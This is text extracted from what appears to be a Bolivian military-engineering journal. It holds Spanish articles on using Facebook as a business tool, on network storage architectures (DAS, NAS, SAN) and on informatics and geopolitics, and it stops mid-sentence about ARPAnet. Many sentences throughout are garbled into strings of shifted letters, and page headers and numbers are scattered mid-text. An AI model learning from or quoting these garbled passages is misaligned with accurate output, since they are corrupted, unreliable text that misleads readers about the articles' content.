¸)VV[Z[YHWTL[OVKZ!(UVther look at the jackknife”. Revista electrónica The Annals of Statistics, 7, páginas 1-26. )YHKSL`,MYVU “Nonparametric estimates VM Z[HUKHYK LYYVY! ;OL QHJRRUPML [OL IVV[Z[YHW and other methods”, Biometrika, 68, páginas 589-599 ,STt[VKV)VV[Z[YHWLZ\UHHS[LYUH[P]HLÄJPLU[LH la inferencia clásica basada en supuestos paramétricos donde es imposible calcular una expresión de la desviación estándar del estimador o tiene una fórmula muy complicada para el cálculo de su error estándar. D I G M A 24 7HY[PJPWHJP}UKLSH,40LULSKLZÄSLJP]PJV4PSP[HY AL SALIR DE LA UNIVERSIDAD, APROVECHAR CUANTO SÉ DE FACEBOOK, YA NO COMO UNA RED SOCIAL, SINO COMO UNA HERRAMIENTA ESTRATÉGICA DE DESARROLLO EMPRESARIAL Ing. Sergio Toro Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería Irpavi (La Paz) Bolivia RESUMEN La popularidad que ha tomado el facebook, y la experiencia que muchos jóvenes han logrado desarrollar sobre esta plataforma, debe ser una ventaja que se la podría utilizar viendo a esta importante red social ya no como eso, sino más bien como un medio para relacionarse en como una estrategia empresarial en posibles emprendimientos personales o en su caso para poder desarrollar un WLYÄSLTWYLZHYPHS]PLUKV[HSJ\HSPKHKJVTV\UUPcho laboral a futuro. ABSTRACT The popularity has taken the facebook, and the experience that many young people have developed on this platform must be an advantage that it could use seeing this important social network and not like that, but rather as a means to engage in as a business strategy in possible personal endeavors or possibly to develop a business. DESARROLLO Como sabemos, una red social es una estructura social en donde hay individuos que se encuentran relacionados entre sí. Las relaciones pueden ser KL KPZ[PU[V [PWV JVTV PU[LYJHTIPVZ ÄUHUJPLYVZ amistad, relaciones de todo tipo, entre otros; así mismo las redes sociales en internet son páginas que permiten a las personas conectar con amigos, PUJS\ZV YLHSPaHY U\L]HZ HTPZ[HKLZ H ÄU KL JVTpartir contenidos, interactuar, crear comunidades sobre intereses similares: trabajo, lecturas, juegos, amistad, relaciones interpersonales, en este sentido el Facebook en el pasado inmediato ha sido una de las herramientas más utilizadas y por ende sobre las que más conocimiento tienen los estudiantes contemporáneos, y es aquí donde surge la primera pregunta. ¿Por qué no sacar provecho de ese conocimiento Haciendo algo de historia podemos decir que Facebook nace el 2004, primero para los estu- diantes americanos y luego abrió sus puertas a cualquier persona que cuente con una cuenta de correo electrónico. En nuestro país como en muchos otros, no se hizo esperar mucho pues se da cuenta de que en 2005 ya habían usuarios bolivianos disfrutando de la globalización, gracias a una serie de factores de diversa naturaleza, Es así que esta plataforma ha crecido impensadamente en una forma desproporcionada, pues en menos de 10 años cuenta con más de 1.000 millones de usuarios utilizándolo en 70 idiomas, Según la propia compañía de este millar de millones de usuarios, se sabe que hay más de 600 millones que lo acceden desde dispositivos móviles, ósea en cualquier momento, desde cualquier lugar, dispuestos a brindar cualquier información. Se puede destacar que para que esta gran plataforma funcione, se cuenta con una infraestructura formada por una red de más de 50.000 servidores que usan distribuciones del sistema operativo GNU/Linux (Software Libre) usando LAMP (Linux – Apache – MySql - Php), Facebook ofrece servicios que van desde encontrar viejos amigos hasta jugar en línea y compartir fotografías hasta noticias sin importar donde te encuentres tu o tus amigos. Facebook es un gigante de la red que ha tenido impacto en todos los ámbitos posibles, desde el psicológico al social y actualmente sabe más sobre ti que cualquier otra compañía en la historia de la humanidad, pues la información es suministrada de forma voluntaria con datos profundamente personales que incluyen gustos, preferencias, aversiones hasta el estado de animo o sentimental por mencionar algunos detalles. Motivo por el cual además de usar esta plataforma para saber temas que podríamos considerar irrelevantes, podemos verla como la principal plataforma de investigación de mercado del mundo. Entonces nos podemos hacer una nueva pregunta. ¿Por qué no incorporar Facebook dentro de la estrategia de una empresa, para así poder conocer y conectar clientes potenciales, interactuar P A R A D I G M A 25 P A JVULSSVZSVNYHYVI[LULYZ\JVUÄHUaH`WVYLUKL su lealtad a lo que nosotros hacemos? El boca a boca siempre fue la mejor herramienta de marketing para una empresa. Las personas hacen negocios con personas y empresas que conocen, aprecian y confían. Y las personas confían en sus amigos… y eso es exactamente lo que FaceIVVRUVZIYPUKHLSWVKLYKLSHPUÅ\LUJPHKLWHYLZ o compañeros. R A D Ya sea Facebook o cualquier red social es una herramienta de marketing muy potente que te abrirá puertas donde antes no las había, brindándote un espacio para buscar clientes potenciales y nuevos nichos de mercado, contactar con profesionales HÄULZ ` YLHSPaHY WYV`LJ[VZ JVUQ\U[VZ JVU V[YVZ países, es una oportunidad de mostrar el trabajo que desarrollamos online. Si bien aún hay muchas empresas que no se han enterado de que sus clientes están en Internet y no confían en las redes sociales para colocar sus productos y ganarse adeptos, que solo las asocian al ocio, sin darse cuenta que un mundo interconectado por Internet una empresa que decide quedarse afuera deja de ser conocida, no existe; hay empresas que SI existen y que apostaron a entrar en el mundo de las redes, apostaron a comunicarse con sus clientes a convertirse en una amigo más. El Ingeniero de Sistemas tiene en las Redes Sociales un nuevo nicho de desarrollo profesional, es asÍ, que si hasta ahora el Facebook fue una herramienta de oscio, diversión y de relacionamiento social, debemos ver esa expertiz que logramos a lo largo del tiempo como una oportunidad, y tratar de maximizar nuestro conocimiento a favor de la empresa en la que nos toque trabajar ya sea nuestro propio emprendimiento o un empleo del que colguemos nuestro futuro. I G M A 26 Estudiantes destacados abanderados de cada Carrera SISTEMAS DE ALMACENAMIENTO EN RED Ing. Luis Alberto Ruiz Lara. *HSSL3P[VYHS ¶4PYHÅVYLZ¶3H7Ha e-mail: [email protected] RESUMEN En el Articulo se presenta una breve descripción de los tipos de almacenamiento, Direct Attached Storage (DAS), Network Attach Storage (NAS), Storage Area Network (SAN) y NAS Gateway describiendo sus ventajas y desventajas, INTRODUCCIÓN El almacenamiento es una parte esencial de la infraestructura de cualquier empresa, en una red con aplicaciones cliente/servidor y otras aplicaciones LZWLJxÄJHZSHTH`VYWHY[LKLS[PLTWVX\LSVZZLYvidores no funcionan se debe principalmente con problemas de almacenamiento. Para solucionar estos problemas aparecieron las redes de almacenamiento y diversos protocolos de transporte de comandos de entrada/salida para permitir el interJHTIPVLÄJPLU[LKLPUMVYTHJP}U No hace mucho tiempo existía una clara distinción entre las necesidades de almacenamiento de datos de las pequeñas empresas y las de las empresas más grandes. Las pequeñas empresas dependían principalmente de la información contenida en sus PC. Si los archivos no estaban disponibles durante algunas horas o incluso días, se consideraba un inconveniente y no un desastre. Es por esto que surge la interrogante de cómo satisfacer las crecientes necesidades de almacenamiento Las necesidades de almacenamiento se han incrementado debido a la digitalización de documentos impresos; el aumento del uso de medios multimedia como la voz, vídeo y de otros formatos agregándole a esto las normativas locales o regionales que exigen almacenar durante días meses o años los archivos y los datos. Las necesidades de almacenamiento se han duplicado o triplicado año [YHZ H|V ` ZL ULJLZP[HU MVYTHZ LÄJPLU[LZ WHYH HSmacenar y compartir volúmenes de datos mucho mayores. El método elemental para almacenar datos en un equipo informático es utilizar un dispositivo local, P A generalmente un disco duro. En grandes organizaciones, las cuales manejan grandes volúmenes de datos, almacenarlos en discos locales no es adecuado, pues tienen los siguientes inconvenientes: -HS[HKLÄHIPSPKHK!:LW\LKLUWLYKLYKH[VZHJH\sas de averías en los discos. Se desaprovechan recursos. Un equipo puede tener espacio libre de almacenamiento y no puede ser aprovechado por otros. +PÄJ\S[HK KL HKTPUPZ[YHY SVZ KH[VZ 3VZ KH[VZ ZL encuentran repartidos por la toda la red de ordenadores. La solución RAID, mejora las características del almacenamiento en discos locales. Los servidores NAS y las redes SAN, proporcionan una solución global al problema del almacenamiento. OBJETIVO El presente artículo está destinado a exponer las distintas tecnologías del almacenamiento en red (Storage Networking) que es una tecnología emergente del trabajo realizado en el entorno de computación de alto rendimiento. Con Storage Networking se establece una red dedicada de alto rendimiento para conectar directamente los dispositivos de almacenamiento, lo que permite a los archivos y datos ser directamente transferidos entre dispositivos de almacenamiento y maquinas cliente. Se realizara una breve descripción de las tecnologías de almacenamiento DAS, NAS, SAN y NAS Gateway. ANTECEDENTES El término data sharing, se utiliza para describir el acceso de los datos comunes a través de múltiples servidores. Compartir datos implica diferentes grados de complejidad y accesibilidad de datos entre R A D I G M A 27 P A plataformas homogéneas y heterogéneas. Vale la pena señalar que un cierto grado de intercambio ya está implementado fuera del entorno SAN. Sin embargo, la infraestructura SAN proporciona un ambiente más propicio en el que la aplicación o el uso compartido de datos de almacenamiento en el entorno de sistemas abiertos. SAN también amplía el alcance de las posibilidades de promover el intercambio de datos. Dos interpretaciones distintas de compartir los datos son los siguientes: Actualizaciones Si su capacidad de almacenamiento se desborda, probablemente tendrá que apagar el servidor para instalar una nueva unidad de disco duro. Esta operación requiere tiempo y recursos de personal. Algunos servidores y soluciones de almacenamiento externo permiten cambiar discos duros mientras el servidor sigue funcionando, pero suelen ser soluciones de alto nivel destinadas para grandes empresas. Arquitectura DAS R A D I G M A 28 Sistema de Almacenamiento Compartido: Dos o más plataformas homogéneas o heterogéneas comparten un solo sistema de almacenamiento, cuya capacidad se ha dividido de manera que cada host conectado sólo puede acceder a las unidades de almacenamiento que se le asignen. El sistema de almacenamiento debe ser compatible con cualquiera de las uniones directas de cada plataforma, o un componente funcional interTLKPVKLILZLYJVSVJHKVLU[YLLSHUÄ[YP}U` el sistema de almacenamiento para traducir los comandos y protocolos utilizados por el TLJHUPZTVKLÄQHJP}U Intercambio de datos Verdadero: Una sola copia de datos es compartida por múltiples hosts conectados al mismo sistema de almacenamiento. Para garantizar la integridad de los datos, los sistemas operativos host, deben contar con software de servidor de aplicaciones adicional, que proporcione capacidades de acceso compartido, como los protocolos de bloqueo o la serialización. Este tipo de intercambio ya está disponible en la actualidad a través de servidores homogéneos en varias plataformas. La Distribución heterogénea de los datos de hoy se lleva a cabo a través de protocolos de intercambio de archivos, tales como Network File System (NFS) y Common Internet File System (CIFS). DAS: Direct Attached Storage El almacenamiento de conexión directa es el almacenamiento que está relacionado directamente con un PC o un servidor. Puede compartir archivos que tenga almacenados en cualquiera de los discos duros de su PC. Puesto que los discos los tiene directamentamente conectados a la PC o el Servidor. La Disponibilidad de almacenamiento DAS sólo es accesible mediante el servidor o el PC al que está conectado. Si ese servidor se apaga o está fuera de servicio por alguna razón, los archivos no estarán disponibles. Rendimiento El sistema operativo de los servidores habituales está diseñado para ejecutar muchas aplicaciones diferentes, proporcionar distintos tipos de servicios y ejecutar diferentes tareas de forma simultánea. Un sistema operativo con todas sus funciones puede acabar afectando negativamente al rendimiento si lo único que necesita es compartir sus archivos. Flexibilidad Puede experimentar los mismos problemas con unidades DAS conectadas a un servidor que con unidades DAS conectadas a un PC. A medida que su empresa crece y añade servidores a su red, la capacidad de los servidores y las unidades más utilizadas se ve desbordada con frecuencia y necesitan actualizaciones, mientras que los servidores menos utilizados tendrán espacio de sobra, pero no podrán compartirlo con sus hermanos más necesitados. A pesar de estos inconvenientes, las unidades DAS pueden ser una solución viable poco costosa para muchas redes, especialmente aquellas que también quieran ejecutar aplicaciones como correo electrónico, CRM y otras soluciones de bases de datos. NAS: Network Attach Storage Un NAS es un equipo de almacenamiento que no están conectados directamente a un ordenador o servidor sino que se accede a ellos a través de la red LAN. Su propósito es el servicio especializado ÄJOLYVZ El uso de dispositivos NAS permite separar en máquinas diferentes el servicio de gestión de los datos, del servicio de almacenamiento de los mismos, y aprovechar las ventajas de este hecho. Un dispositivo NAS se compone de un sistema de almacenamiento a los que cualquier equipo con los permisos adecuados puede acceder. El acceso a los datos que almacenan se realiza utilizando WYV[VJVSVZKLHJJLZVHÄJOLYVZLUYLKJVTV5-: – Network File System- o SMB –Server Message Block-, sobre protocolos de red, normalmente TCP/IP. Arquitectura NAS El servidor NAS sólo presta el servicio de acceso a ÄJOLYVZUVYLHSPaHUPUN\UHV[YHSHIVYWVYSVX\L[PLne un hardware simple. Por ejemplo suelen ser equipos en rack sin teclados ni monitores con sólo una interface web para su administración. Suelen tener una gran memoria RAM, para proporcionar caché de disco. Utilizan SO especializados, como freeNAS, \UH ]LYZP}U ZPTWSPÄJHKH KL MYLL):+ WHYH LX\PWVZ NAS. Las unidades NAS tienen muchas ventajas: Independencia, una unidad NAS se puede asentar en cualquier parte de su red, con independencia de los servidores y sirve archivos a cualquier PC o servidor conectado. Si un servidor o PC se apaga, el dispositivo NAS seguirá funcionando. Si se apaga, UV ULJLZP[HYm YLHSPaHY JVTWSLQHZ JVUÄN\YHJPVULZ .YHJPHZ H Z\ ZPTWSL HYX\P[LJ[\YH ` JVUÄN\YHJP}U una unidad NAS puede volver a estar funcionando en apenas minutos. Facilidad de uso, las unidades NAS suelen tener \UHWYLJVUÄN\YHJP}UKLZVS\JPVULZJVTWSL[HZ5V es necesario instalar un adaptador de host ni un sistema operativo. Sólo necesita conectar la unidad NAS a la red y, dependiendo de la simplicidad de la interfaz de usuario, sólo tendrá que realizar ligeras JVUÄN\YHJPVULZ LU Z\ UH]LNHKVY >LI :}SV [LUKYm X\L YLHSPaHY SPNLYHZ JVUÄN\YHJPVULZ LU SVZ 7* y servidores que acceden al dispositivo, pero en la mayoría de los casos podrá empezar a trabajar en apenas minutos. P En comparación con los servidores tradicionales, las unidades NAS requieren poco mantenimiento, pocas actualizaciones y solucionar muy pocos problemas. Todas las tareas de administración necesarias se suelen realizar mediante una simple interfaz de navegador Web. A Actualizaciones simples, añadir almacenamiento a un servidor suele requerir apagarlo, sustituir una unidad o añadir otra y volver a encender el servidor. Para obtener mayor capacidad de almacenamiento sólo necesita conectar otro dispositivo NAS a la red y podrá volver a trabajar con mayor capacidad de almacenamiento compartido en apenas minutos. Algunas unidades NAS permiten cambiar los discos duros o añadir almacenamiento interno o externo mientras están funcionado (conocido comúnmente como “cambios en caliente”). *VWPHZ KL ZLN\YPKHK ZPTWSPÄJHKHZ SHZ \UPKHKLZ NAS pueden ser una excelente solución de almacenamiento para realizar copias de seguridad de PC. Muchas de estas unidades incorporan un sof[^HYLKLJVWPHKLZLN\YPKHKMmJPSKLJVUÄN\YHY` utilizar, tanto para realizar copias de seguridad de los PC de los usuarios en NAS como para realizar copias de seguridad de NAS en otro dispositivo de almacenamiento, cinta o un servicio de copia de seguridad externo. Si tiene todos sus archivos en una única ubicación, la copia de seguridad es mucho más fácil que si tuviera los archivos diZLTPUHKVZLUSVZLX\PWVZKLSHVÄJPUH(SN\UHZ unidades NAS incorporan útiles de herramientas para migrar datos al dispositivo y replicar datos en la red desde un dispositivo de almacenamiento a otro. Permite compartir datos entre sistemas heterogéneos. Cualquier cliente conectado a la Red que utilice los protocolos estándares puede acceder a los ÄJOLYVZHSTHJLUHKVZLUSH5(:,Z\UZPZ[LTHKL almacenamiento compartido de bajo precio, comparado con la alternativa SAN. Son muy escalables, basta con ir conectando más dispositivos a la red. Son muy fáciles de usar y mantener gracias a su simplicidad. R A D I G M A Sus inconvenientes son: Su rendimiento está directamente relacionado 29 P A R A D I G M A 30 con el rendimiento de la red LAN. Su uso consume recursos de red y, en los momentos como las copias de seguridad, que hay que mover grandes cantidades de datos, se puede saturar la red. El rendimiento de las operaciones de E/S LZTLUVYLZWLJPHSTLU[LHS[YHIHQHYJVUÄJOLYV de gran tamaño. No es un medio de almacenamiento válido para tipo de aplicaciones, debido HS \ZV KL \U WYV[VJVSV KL [YHUZMLYLUJPH KL Ächeros. Por ejemplo, no es válido para almacenar los datos de un Sistema Gestor de Base de Datos. Arquitectura SAN SAN: STORAGE AREA NETWORK Las redes SAN son una solución global al almacenamiento de datos en una gran organización. Son redes multiservidor y multialmacenamiento que actúan como redes secundarias de las redes LAN de la organización. En la red SAN se conectan los equipos de almacenamiento de datos de la organización y los servidores que deben acceder a estos datos. En el modelo tradicional, los servidores de una organización almacenaban la información en dispositivos locales como discos duros, RAIDS, cintas... o accedían a servidores de datos conectados a la red LAN –NAS : Network Attach Servers- a los que enviaban las peticiones de información. Se formaban “granjas” de servidores de archivos en la LAN. En una red SAN utiliza la virtualización del espacio de almacenamiento, es decir se abstrae la organización lógica del espacio de almacenamiento de su organización física. Todos los dispositivos de almacenamiento masivo de la organización (servidores de archivos, sistemas de cintas, etc.) se organizan como un solo bloque de espacio de almacenamiento. Este bloque se divide en particiones que se utilizan a diferentes usos. Esta forma de organizar el espacio de almacenamiento tiene las siguientes ventajas: Rapidez, permite acceder a la información de forma rápida. Las conexiones a la red SAN son de alta ]LSVJPKHK3H[LJUVSVNxHKLÄIYH}W[PJHHSJHUaHSVZ 4 Gbps y tienen poca latencia. Alcance, aprovecha SHZJHWHJPKHKLZKLSHÄIYH}W[PJHWHYHWVKLY[LULY conexiones de hasta 10 km sin ruters. Control, se consigue una administración centralizada y homogénea. Se puede reparticionar y reasignar el espacio de forma rápida y fácil. Se reasigna LZWHJP}KLHSTHJLUHTPLU[VZPUOHJLYTVKPÄJHJPVULZLUSHZJVUL_PVULZMxZPJHZ7LYTP[LTVKPÄJHKSH ubicación física de los datos de forma transparente a los servidores. Libra a la red LAN de sobrecarNHZWVYLS[YmÄJVKLKH[VZ`ZVULZJHSHIYLZ`T\` ÅL_PISLZ0UZ[HSHY`THU[LULY\UHYLK:(5LZJVZtoso, pero permite amortizar su coste entre todas las aplicaciones y servidores de la organización. Es usado por ejemplo, en los Centro de Proceso de datos NAS Gateway Por ejemplo, los bloques pueden utilizar sistemas de archivos diferentes. Las redes SAN pueden alcanzar centenares de TeraBytes de capacidad. La comunicación entre los servidores y los dispositivos de almacenamientos se realiza a bajo nivel, se transmiten a nivel de bloques de datos, a diferencia de los sistemas NAS. Las conexiones son uno a uno, una partición de almacenamiento lógico sólo ser accedido por un servidor cada vez. Un NAS Gateway da la funcionalidad de un NAS convencional, pero sin almacenamiento integrado. El almacenamiento en disco está unido externaTLU[L HS NH[L^H` ` HJLW[H WL[PJPVULZ ¸ÄSL 06¹ usando el protocolo NFS o CIFS y las traduce a peticiones SCSI “block I/O” para acceder a los discos conectados externamente. Un NAS Gateway funciona como un objetivo para las peticiones de archivos de E / S procedentes del PUPJPHKVY*\LU[HJVU\UZPZ[LTHVWLYH[P]VZPTWSPÄcado que traduce el archivo de E / S a bloques de I / O, esto para la interacción con el almacenamiento de destino que se encuentra en la SAN. CONCLUSIONES En conclusión dependiendo de las necesidades de su empresa y de su experiencia técnica, debe- rá decidir entre una solución DAS, SAN o NAS. Si su objetivo es compartir archivos e impresoras y su personal cuenta con poca experiencia técnica en trabajo en red, NAS suele ser la solución más acertada. P Si cuenta con bases de datos Transaccionales o HWSPJHJPVULZJYx[PJHZSHZVS\JP}UTmZLÄJPLU[LZLYxH el de implementar una SAN. A R A D I G M A Biblioteca de la EMI - UALPZ 31 P LA INFORMÁTICA Y SU IMPACTO GEOPOLÍTICO Cnl. DAEN. Héctor Gastón Yáñez Paniagua Estudiante Doctorado en Educación Enfoque en la Complejidad y la Investigación Transdisciplinar Escuela Militar de Ingeniería La Paz, Bolivia (2013) [email protected] A R A D I RESUMEN: El sector informático juega un papel crucial en las posibilidades de crecimiento del continente latinoamericano. La presencia de las grandes multinacionales relacionadas a la informática, además de capacitar con los mayores avances del sector IT a los profesionales del continente, favorecen la reducción de la brecha digital, es decir el acceso a la informática a los sectores más desfavorecidos. Efectivamente una adecuada explotación de los medios que pone a disposición la informática e el INTERNET en América Latina brinda sin dudas una serie de ventajas a los usuarios-habitantes del continente latinoamericano, pudiendo de esta manera el desarrollo de la informática ser explotado en diversas áreas de interés tales como la educación, la economía, las estadísticas, gestión de los gobiernos, comercio, datos de la persona, etc.., es decir una serie de ventajas fundamentales para el crecimiento del continente. PALABRAS CLAVE: G M A 32 Complejidad, Transdisciplinariedad, Informática, Geopolítica. ABSTRACT The computer industry plays a crucial role in the growth potential of Latin America. The presence of large multinationals related to information technology, in addition to training with major IT industry developments to professionals of the continent, in favor of the reduction of the digital breach, and access to information on the most disadvantaged. Indeed adequate explotation of the means available to the computer and the INTERNET in Latin AmeYPJH WYV]PKLZ ^P[OV\[ KV\I[ H U\TILY VM ILULÄ[Z to users, these people of Latin America can thus develop computer be exploited in several areas of interest such as education, economics, statistics, management, government, trade, details of the per- son, etc. .., in a while a number of key advantages for the growth of the continent. KEY WORDS: Complexity, Transdisciplinariedad, Complex Investigation. INTRODUCCIÓN. El Ordenador o más conocida como Computadora, es un dispositivo electrónico capaz de recibir un conjunto de instrucciones y ejecutarlas realizando cálculos sobre los datos numéricos, o bien compilando y correlacionando otros tipos de información. El mundo de la alta tecnología nunca hubiera existido de no ser por el desarrollo del ordenador o computadora. Toda la sociedad utiliza estas máquinas, en distintos tipos y tamaños, para el almacenamiento y manipulación de datos. Los equipos informáticos han abierto una nueva era en la fabricación gracias a las técnicas de automatización, y han permitido mejorar los sistemas modernos de comunicación, respaldando las expectativas que tiene la geopolítica respecto a esta ciencia. Son herramientas esenciales prácticamente en todos los campos de investigación y en tecnología aplicada, considerando su empleo y explotación en todos los campos de la Geopolítica, en contribución del desarrollo o la posible expansión de las naciones. La Informática por su parte es un conjunto de conoJPTPLU[VZJPLU[xÄJVZ`KL[tJUPJHZX\LOHJLUWVZPble el tratamiento automático de la información por medio de computadoras. La informática combina los aspectos teóricos y prácticos de la ingeniería, electrónica, teoría de la información, matemáticas, lógica y comportamiento humano. Los aspectos de la informática cubren desde la programación y la HYX\P[LJ[\YH PUMVYTm[PJH OHZ[H SH PU[LSPNLUJPH HY[PÄcial y la robótica. Podemos indicar que la informática ejerce un rol importante en la actualidad, debido al apoyo que realiza a la geopolítica desde el punto de vista del manejo de información, que permite acceder a da[VZÄKLKPNUVZYLNPZ[YHKVZIHZmUKVZLLUSHYLHSPKHK o como parte de una terminal de todo el sistema informático, de ésta manera se podrá obtener datos a través de la computadora y aprovechando las bondades del satélite; de ahí la importancia de esta investigación. ,SHKLSHU[VJPLU[xÄJVOHWLYTP[PKVHSVZ\Z\HYPVZ[Lner a disposición elementos necesarios como para compartir información a todo nivel, respecto a las diferentes áreas o temas que puedan ser extraídos de la red de INTERNET. Asimismo la tecnología como agregado de la informática, proporcionó un producto que es empleado como instrumento de ]LYPÄJHJP}UKLSH\IPJHJP}UYLZWLJ[VHSHZSH[P[\KLZ y longitudes del globo terráqueo, siendo explotado por los geodésicos como medios de ubicación de puntos con mucha precisión. La tecnología informática ha alcanzado sitiales expectables desde el momento en que el ordenador con la ayuda de un software adelantado, comenzó a pensar, es decir empezaron a tomar decisiones respecto a algunos asuntos tales como: vuelos, proyecciones, predicciones, decisiones, etc., que se explotan en la actualidad bajo el nombre de In[LSPNLUJPH(Y[PÄJPHS A través del tiempo la Geopolítica ha tenido difeYLU[LZ PU[LYWYL[HJPVULZ ` KLÄUPJPVULZ X\L SH OHU hecho pasar como una ciencia determinante para la toma de decisiones en el nivel político, hasta una ciencia de carácter mítica, que contaba dentro su propósito ser una especie de pronóstico del futuro, atribuyéndole concepciones agresivas, expansionistas, promotoras de utopías e incluso de guerras entre Estados. 3HHU[LYPVYKLK\JJP}UW\LKL]LYPÄJHYZLKLSLZ[\KPV de numerosos escritos, mapas, grabados y otros testimonios, que demuestran la preocupación de SVZ JVUK\J[VYLZ WVSx[PJVZ N\LYYLYVZ NL}NYHMVZ ÄS}ZVMVZ`JPLU[xÄJVZKL[VKVZSVZ[PLTWVZ"WVYJVUVJLY HS Tm_PTV SH YLHSPKHK NLVNYmÄJH KLS T\UKV y, especialmente, las características y condiciones NLVNYmÄJHZKLZ\ZYLZWLJ[P]VZ,Z[HKVZJVTV[HTIPtUKLHX\LSSVZWHxZLZVmYLHZNLVNYmÄJHZKLTHyor interés político, económico y militar, ya sea por su condición de posibles enemigos, aliados u otros. La Geopolítica es una de las ciencias que más ha evolucionado desde su nacimiento a principios de siglo XX, la cual se ha ido consolidando a través KLS[PLTWVJVTV\UJVUVJPTPLU[VJPLU[xÄJV[L}YPJV y pragmático que se inspira en la intima relación entre el Estado y el espacio donde aquel tiene un interés político que satisfacer. Un conocimiento que dispone de un campo de investigación propio: el espacio geopolítico; una metodología propia de razonamiento y una terminología exclusiva, única y diferenciada. ,ULZLZLU[PKVWHY[HTVZKLSHZPN\PLU[LKLÄUPJP}U de geopolítica, la misma nos permitirá realizar un análisis adecuado respecto al impacto de la Informática hacia la Geopolítica: “Geopolítica es la ciencia que estudia, cuál es la inÅ\LUJPHLQLYJPKHWVYSVZMHJ[VYLZNLVNYmÄJVZLOPZ[}YPJVZLUSH]PKH`L]VS\JP}UKLSVZ,Z[HKVZHÄU de extraer conclusiones de carácter político. Sirve de guía al estadista en la conducción de la política interna y externa del Estado y orienta al militar en la preparación de la defensa nacional y en la conducción estratégica, al facilitar la previsión del futuro y establecer la forma en que pueden ser alcanzados los objetivos; en consecuencia, deducir las medidas para la conducción política o estratégica más conveniente” Desde el punto de vista; apoyo a la obtención, almacenamiento y difusión del cúmulo de información permitirá a la informática, ejecutar una admiUPZ[YHJP}UHKLJ\HKHKLSHPUMVYTHJP}ULUILULÄJPV de la geopolítica, con la ayuda de equipos de computación, bajo soportes de sistemas de gestión, que facilitarán su aplicación o consulta en todos o la mayoría de los sectores de la sociedad. Fundamentalmente el presente artículo contendrá los siguientes aspectos: una parte introductiva, con \UHKLZJYPWJP}UNLULYHSKLS[PWVKLPUÅ\LUJPHX\L se enmarca al trabajo respecto al apoyo que podría proporcionar la informática a la geopolítica, considerando el nuevo rol que llegaría a desempeñar en este desafío del aprovechamiento de la tecnología LU ILULÄJPV KL LZ[H JPLUJPH 7VZ[LYPVYTLU[L ZL realizará una explicación técnica orientada a la exWSV[HJP}UKLLZ[LTLKPVLUILULÄJPVKLSHNLVWVlítica, determinando sus características, su posible aplicación en merced de la geopolítica así como un fundamento primordial para la ejecución de las operaciones militares, así mismo explotar a la informática desde el punto de vista de la Inteligencia Ar[PÄJPHSJVTV\UTLKPVWHYHSHVI[LUJP}UKLZPT\SHdores que permitan adoptar medidas precautorias dentro los diferentes ámbitos. De todo este análisis se podrá determinar unas conclusiones que nos permita percibir claramente nuestra realidad respecto al contexto en el que nos encontramos. P A R A D I G M A 33 P A I.- DESARROLLO GEOPOLÍTICA Karl Ritter “Geopolítica es la ciencia que, considerando a la Geografía como ciencia del globo viviente, estudia los aspectos morales y materiales del mundo, para prever y orientar el desarrollo de las naciones, en el X\L PUÅ\`LU WYVM\UKHTLU[L SVZ MHJ[VYLZ NLVNYmÄcos”. Friedrich Ratzel R A “La Geopolítica es la ciencia que establece que las JHYHJ[LYxZ[PJHZ`JVUKPJPVULZNLVNYmÄJHZ`T\`LZpecialmente, los grandes espacios, desempeñan un papel decisivo en la vida de los Estados y que el individuo y la sociedad humana dependen del suelo en que viven, estando su destino determinado por las leyes de la Geografía. Proporciona al conductor WVSx[PJVLSZLU[PKVNLVNYmÄJVULJLZHYPVWHYHNVILYnar”. Rudolf Kjellen D I “La Geopolítica es la teoría del Estado como orNHUPZTVNLVNYmÄJVVMLU}TLUVLULSLZWHJPVLZ decir, el Estado como tierra (país), territorio, dominio o más distintamente como reino. Como Ciencia Política tiene siempre en vista la unidad del Estado. La Geopolítica es la ciencia del Estado como orgaUPZTVNLVNYmÄJV`ZPNUPÄJH[P]HTLU[LJVTLU[HYPVZ físicos, humanos y políticos. Teorías que respaldan el impacto de la Informática en la Geopolítica G Respecto a la investigación que nos impulsa a la investigación podemos mencionar qué el “sistema nacional” y el “sistema mundial” son, para Brucan , el punto de partida, mientras que la “integración nacional” y la “integración supranacional”, su punto de llegada. M En su primer modelo, que se plantea, hace que las naciones se comporten de manera distinta, y se encuentra compuesto por cinco variables: A 34 1. Los factores materiales-naturales básicos referidos al tamaño del territorio y la poblaJP}UZP[\HJP}UNLVNYmÄJH`SHZM\LYaHZWYVductivas, es decir respecto a la posible producción de las diferentes zonas de cualquier Estado o Nación. 2. Fuerzas y estructuras sociales diferenciando en clases y grupos sociales, naciones y nacionalidades, las mismas que pueden ser consideradas potencialmente para su emWSLVLUJ\HSX\PLY[PWVKLJVUÅPJ[V 3. Factores contingentes y situacionales como las crisis, golpes de Estado, elecciones, huelgas masivas, violencia a gran escala, acciones militares y guerra, que son una parte de la historia, que servirá como elemento de información a los usuarios. 4. El sistema estatal como la maquinaria nacional de toma de decisiones, el aparato estatal, o el gobierno, que le permita obtener datos relacionados con todos los factores de poder para adoptar una adecuada medida de decisión. 5. El liderazgo como la forma en que el poder es usado y dirigido, considerando que el que tiene la información tiene el poder, en ese sentido su explotación será muy importante para una adecuada decisión en cualquiera sea ámbito en el que se trabaje. Este modelo, fue diseñado para entender al “sistema mundial”, que según Brucan “está basado en ciertas estructuras y construido a partir de unidades -los Estados- cuyas actividades se ajustan a la dinámica interna del sistema mundial, desplegando cierto grado de regularidad, y funcionando conforme a determinados principios de conducta”. De donde podemos señalar que este modelo está basado en un sistema de cuatro variables: 6. La presión de la tecnología moderna y de la interdependencia; La política del poder; La H\[VHÄYTHJP}UKLSHZUHJPVULZ"`,SJHTIPV social. La esencia de esta dinámica es resumida por Brucan de la siguiente forma: “Dado que la tecnología moderna no tiene un impacto directo sobre la política, la presión de la tecnología y de la interdependencia hace sentir un impacto tanto sobre las relaciones de clase dentro de la sociedad como un poderoso motor del cambio social, así como sobre las relaciones entre las naciones, en sus dos encabezados principales: «la política del poder», la cual hoy básicamente asume la forma de rivalidad y dominio de las superpotencias, y su respuesta JVU[YHYYLZ[HU[L SH H\[VHÄYTHJP}U KL SHZ UHJPVULZ pequeñas y en desarrollo. Esta es, esencialmente, la dinámica de la política mundial” 9LÄYPtUKVUVZ H SH ]LYKHKLYH LZLUJPH KLS PTWHJ[V que ejerce en la Geopolítica podemos indicar que la Informática proporcionará una serie de datos útiles, tales como registros estadísticos sobre la producción, demografía, minería, comercio, vías de comunicación, etc.; para el desarrollo de las naciones. C.- Internet Los orígenes de INTERNET que es motivo de nuestra investigación respecto a la GEOPOLÍTICA, diremos que ésta se remonta a 1969 con ARPAnet que era una red experimental 